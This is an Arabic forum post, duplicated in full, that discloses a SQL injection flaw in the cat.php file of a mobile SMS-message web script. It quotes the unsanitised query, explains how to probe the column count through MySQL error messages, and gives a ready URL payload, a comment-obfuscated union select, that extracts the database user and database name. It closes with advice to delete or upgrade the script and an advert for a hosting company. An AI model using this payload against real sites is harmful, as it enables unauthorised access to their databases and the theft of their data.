linnou
11-02-2013, بتوقيت غرينيتش 12:52 AM
السلام عليـكم ..
الامــس وانا عم بطور في موقع وافحص في سكربتاته ..
دخلت ملف من داخل سكربت الجوال ..
قرأت السورس تبعه .. وجدت فيه ثغرة حقن
الملف المصاب
رمز PHP:
<code style="white-space:nowrap"> <code> /cat.php
</code> </code>
لو دخلت السورس لملف السكربت
السطر 40 :
راح تجد :
رمز PHP:
<code style="white-space:nowrap"> <code> $Sql = "select * from sms where Hidden!=1 and SCat=$CatID order by SID DESC LIMIT $From,$PageNO";
</code> </code>
كما نلاحظ طلب من القاعدة متغير والمبرمج نسي يحمي الطلب ..
الان الثغرة واضحة قدامنا .. تتاكد من الثغرة ؟
طيب بلش اطلب ال sql من القاعدة ..
نختار رقم مش موجود بالقاعدة
-1 ومن ثم نبدا بالاستثمار
رمز PHP:
<code style="white-space:nowrap"> <code> /**/union/**/select/**/0,/*
</code> </code>
ومن تبدا بأضافة ارقام الى ان يذهب الخطا من الصفحة ..
شكل الخطا يكون
رمز PHP:
<code style="white-space:nowrap"> <code> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
</code> </code>
اذا ذهب من الصفحة .. تضف طلب اظهار اسم القاعدة واسم المستخدم ..
رمز PHP:
<code style="white-space:nowrap"> <code> /cat.php?CatID=-1/**/union/**/select/**/0,1,2,3,USER(),DATA****()/*
</code> </code>
تاكد من كل الصفحة اذا تغير شي فيها .. يبقى الثغرة شغاله ... ويا ويلك وشو تسوي http://www.dzbatna.com/images/smilies/crazy.gif
احذف السكربت http://www.dzbatna.com/images/smilies/shiny01.gif
هههه لا شوف الاصدار الي يليه ممكن يكون غير مصاب او جيب سكربت بديل http://www.dzbatna.com/images/smilies/no.gif
وبما
انه معروف انه ال sql لغة معقدة ..
الي يبي يفحص موقعه اذا سكربت الجوال الي مركبه مصاب ولا لا يراجعني على البريد
او الدعم الفني لشركة كل العرب ..
http://host4vb.com
دمتم بود
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
الامــس وانا عم بطور في موقع وافحص في سكربتاته ..
دخلت ملف من داخل سكربت الجوال ..
قرأت السورس تبعه .. وجدت فيه ثغرة حقن
الملف المصاب
رمز PHP:
<code style="white-space:nowrap"> <code> /cat.php
</code> </code>
لو دخلت السورس لملف السكربت
السطر 40 :
راح تجد :
رمز PHP:
<code style="white-space:nowrap"> <code> $Sql = "select * from sms where Hidden!=1 and SCat=$CatID order by SID DESC LIMIT $From,$PageNO";
</code> </code>
كما نلاحظ طلب من القاعدة متغير والمبرمج نسي يحمي الطلب ..
الان الثغرة واضحة قدامنا .. تتاكد من الثغرة ؟
طيب بلش اطلب ال sql من القاعدة ..
نختار رقم مش موجود بالقاعدة
-1 ومن ثم نبدا بالاستثمار
رمز PHP:
<code style="white-space:nowrap"> <code> /**/union/**/select/**/0,/*
</code> </code>
ومن تبدا بأضافة ارقام الى ان يذهب الخطا من الصفحة ..
شكل الخطا يكون
رمز PHP:
<code style="white-space:nowrap"> <code> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
</code> </code>
اذا ذهب من الصفحة .. تضف طلب اظهار اسم القاعدة واسم المستخدم ..
رمز PHP:
<code style="white-space:nowrap"> <code> /cat.php?CatID=-1/**/union/**/select/**/0,1,2,3,USER(),DATA****()/*
</code> </code>
تاكد من كل الصفحة اذا تغير شي فيها .. يبقى الثغرة شغاله ... ويا ويلك وشو تسوي http://www.dzbatna.com/images/smilies/crazy.gif
احذف السكربت http://www.dzbatna.com/images/smilies/shiny01.gif
هههه لا شوف الاصدار الي يليه ممكن يكون غير مصاب او جيب سكربت بديل http://www.dzbatna.com/images/smilies/no.gif
وبما
انه معروف انه ال sql لغة معقدة ..
الي يبي يفحص موقعه اذا سكربت الجوال الي مركبه مصاب ولا لا يراجعني على البريد
او الدعم الفني لشركة كل العرب ..
http://host4vb.com
دمتم بود
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
